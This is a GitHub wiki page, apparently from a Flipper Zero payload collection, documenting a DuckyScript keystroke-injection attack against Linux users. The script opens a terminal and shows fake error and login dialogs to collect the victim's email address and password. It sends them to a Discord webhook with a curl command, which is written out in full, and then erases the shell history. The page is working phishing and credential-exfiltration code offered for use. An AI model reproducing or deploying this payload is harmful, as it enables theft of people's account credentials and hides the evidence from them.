Exfiltrate Email And Password By Phising Linux - aleff-github/my-flipper-shits GitHub Wiki


Script Information

  • Title: Exfiltrate Email And Password By Phishing
  • Author: Aleff
  • Version: 1.0
  • Category: Credentials, Phishing
  • Target:Linux


  • Internet Connection
  • Discord webhook

Code Description

The following DuckyScript code is used to exfiltrate email and password information through a phishing attack. It requires an internet connection and a Discord webhook to be set up. The code opens a terminal window, prompts the user for their email and password information, and sends that information to the specified Discord webhook.

Code Explanation

  1. The DELAY 1000 command waits for 1 second before proceeding.
  2. The CTRL-ALT t command opens a new terminal window.
  3. The DELAY 2000 command waits for 2 seconds for the terminal window to open.
  4. The STRING WEBHOOK_URL="example.com" command sets the Discord webhook URL to "example.com".
  5. The ENTER command presses the Enter key to execute the previous command.
  6. The DELAY 500 command waits for 500 milliseconds for the previous command to execute.
  7. The STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(echo $(kdialog --sorry 'Email incorrect.\n Will not connect to server, please retry.'; kdialog --title 'Email \n Put your email address to connect yout account.' --inputbox 'Email:'; kdialog --title 'Email Login' --password 'Email Password:';))\"}" $WEBHOOK_URL); history -c; exit; command uses the curl command to send a message to the specified Discord webhook. The message contains the user's email and password information, which is obtained by prompting the user through a series of dialog boxes. Finally, the command clears the terminal history and exits.